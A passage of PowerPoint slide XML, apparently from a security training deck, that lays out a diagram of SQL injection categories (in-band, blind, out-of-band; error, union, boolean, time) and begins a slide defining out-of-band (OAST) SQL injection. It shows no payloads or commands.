                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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4260833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260833" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426083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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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574959" y="6984237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59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434928" y="701488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59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32349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2954811" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158077" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or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96577" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="4096577" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4128010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2954810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810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28010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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n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962439" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="7962439" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7993872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2954800" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954800" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048180" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082405" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104850" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112910" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112910" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104850" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082405" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048180" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29548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993872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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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8595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean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1619731" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="11619731" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11651163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5" h="948690">
                  <a:moveTo>
                    <a:pt x="2954779" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158005" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108079" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64707" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30497" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8059" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8059" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30497" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64707" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108079" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158005" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954779" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004756" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048159" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082384" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104829" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104829" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082384" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048159" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004756" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295477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1651163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500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7967631"/>
            <a:ext cx="11245850" cy="992505"/>
            <a:chOff x="1675006" y="7967631"/>
            <a:chExt cx="11245850" cy="992505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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706419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011200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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044"/>
              <a:ext cx="885190" cy="948690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456"/>
                  </a:lnTo>
                </a:path>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="7999044"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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951500"/>
            <a:ext cx="9126855" cy="11099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100" spc="-280"/>
              <a:t>Out-of-Band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-310"/>
              <a:t>(OAST)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-735"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-270"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="71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44752" y="2931714"/>
            <a:ext cx="15375890" cy="3551554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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>consists </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>triggering </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out-of-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-910">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
